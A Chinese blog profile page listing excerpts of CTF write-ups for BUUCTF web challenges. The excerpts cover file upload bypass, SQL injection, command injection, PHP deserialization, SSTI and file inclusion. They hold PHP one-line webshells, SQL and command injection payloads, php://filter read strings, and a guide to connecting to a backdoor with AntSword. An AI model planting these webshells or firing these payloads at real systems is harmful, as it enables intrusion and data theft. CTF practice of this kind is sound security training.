自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 [ACTF2020 新生赛]Upload

actf 2020新生赛 upload

2022-06-17 10:59:54 642 1

原创 [极客大挑战 2019]BabySQL 1(双写绕过)

存在sql注入漏洞username:1’ order by 2#password:1You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1or被过滤username:1’ union select ..

2020-12-08 17:06:55 1568

原创 [极客大挑战 2019]Upload 1(文件上传)

打开环境是一个上传图片的页面。先上传一句话木马试试,这里格式直接不变,先上传看看。<?php eval($_POST['b'])?><?php $_GET['a']($_POST['b'])?>提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht前几个php格式的一句话都被b了,比如php3将文件格式改到phtml可以了,但带<?的一句话

2020-12-08 15:04:37 15737 8

原创 [极客大挑战 2019]Http 1(修改HTTP请求包)

打开环境,查看源码找到了secret.php访问之后说:必须从这个https://www.Sycsecret.com点过来的才有效开burp抓包吧,丢到repeater里面,添加referer头,referer头就是证明你从哪里点进来的。GET /Secret.php HTTP/1.1 Host: node3.buuoj.cn:29856referer:https://www.Sycsecret.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win

2020-11-29 16:14:37 2412

原创 [极客大挑战 2019]PHP 1(PHP序列化/反序列化)

打开环境提示说有备份,直接拿御剑扫吧。网速不太好,线程调很低才扫到目录访问之后下载zip文件在index.php中看到了传参方式: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>通过select传入参数打开class.php<?phpinclude 'flag.php';error_reporting

2020-11-24 23:12:24 256

原创 [极客大挑战 2019]Knife 1(蚁剑连接/安装)

打开环境eval($_POST[“Syc”]);作为后门用post提交一个字符串Syc直接拿蚁剑连接连接之后在根目录下发现了flag获取flag介绍一下蚁剑的安装:AntSword-Loader:https://github.com/AntSwordProject/AntSword-LoaderantSword:https://github.com/AntSwordProject/antSword这两个下载好之后解压在AntSword-Loader-v4.0.3-win32

2020-11-18 12:12:05 830

原创 [ACTF2020 新生赛]Exec 1(Linux/远程命令执行)

打开环境又是一个ping的题,猜测远程命令执行。payload:ping 127.0.0.1;ls直接显示了index.php,要知道Linux系统显示网页的路径是/var/www/html也就是说index.php在这个路径里而且;分号又没有过滤先返回根目录看看flag在不在:127.0.0.1;cd /;ls还真在,而且空格,分号都没过滤。最后的payload:127.0.0.1;cd /;cat flag得到flag...

2020-11-17 15:19:03 908

原创 [RoarCTF 2019]Easy Calc 1(PHP字符串解析漏洞)

打开环境右键查看源码<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <

2020-11-17 11:23:20 457

原创 [GXYCTF2019]Ping Ping Ping(远程命令执行)

打开环境先ping一下本地http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1利用分号执行多命令http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;ls直接cathttp://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0

2020-11-14 21:43:28 652

原创 [护网杯 2018]easy_tornado(SSTI服务器端模板注入)

tornadoTornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。可以考虑服务器端模板注入参考SSTI完全学习SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行,SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty

2020-11-12 10:56:49 681 2

原创 [极客大挑战 2019]LoveSQL(sql注入)

打开环境万能密码试一下1' or 1=1#尝试MD5解密,失败。看来这个密码也许是障眼法。1'order by 4#Unknown column ‘4’ in ‘order clause’1'union select 1,database(),version()#1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#1' union se

2020-11-10 16:47:41 264

原创 [ACTF2020 新生赛]Include(php伪协议)

打开环境点击tips,跳转到了新路径http://0c736741-f9fd-46ea-8c45-b7f0712e099b.node3.buuoj.cn/?file=flag.php由?file还有flag.php考虑使用php伪协议读取文件payload:?file=php://filter/convert.base64-encode/resource=flag.php完整payload:http://0c736741-f9fd-46ea-8c45-b7f0712e099b.node3.b

2020-11-10 15:17:12 392

原创 [极客大挑战 2019]Secret File(伪协议读取文件/文件包含漏洞)

打开环境右键查看源码<a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>访问该路径http://82c21579-ae72-4b1e-9ed7-99f52e71862f.node3.buuoj.cn/Archive_ro

2020-11-09 17:05:48 422

原创 [极客大挑战 2019]Havefun一起来撸猫

一起来撸猫打开环境右键查看代码如果输入的参数‘cat’是dog,则返回sys{cat_cat_cat_cat}构造payloadhttp://2c4b6017-065b-4617-ba9b-d8c9a93b2c50.node3.buuoj.cn/?cat=dog获取flag

2020-11-09 15:51:54 239

原创 [SUCTF 2019]EasySQL(set sql_mode=pipes_as_concat修改||)

都被过滤,查看公开的源码黑名单 :$BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";查询语句:select $_GET['query'] || flag from flag两种方法都是神乎其神的网友大佬想到的1、...

2020-11-09 15:19:29 546

原创 [极客大挑战 2019]EasySQL(万能密码)

打开环境,是一个登录页面输入admin/admin错误测用户名和密码尝试输入全显语句usernam输入1’or 1=1#password随便写成功

2020-11-09 09:00:38 372

原创 [强网杯 2019]随便注(预处理/更改表名列名)

1

2020-11-08 19:17:14 224

原创 [HCTF 2018]WarmUp(代码审计+文件包含)

[HCTF 2018]WarmUp打开后发现是一张图片右键查看源码发现提示 source.php访问该路径: http://65e16222-5574-47b4-b388-aebbcbcf9641.node3.buuoj.cn/source.php.<?php highlight_file(__FILE__);//如果下面任意if返回true,则高亮并返回请求的文件 class emmm { public static function check

2020-11-07 21:33:26 351

原创 关于VMware14虚拟机开启黑屏的问题

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar

2020-11-05 17:13:30 352

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除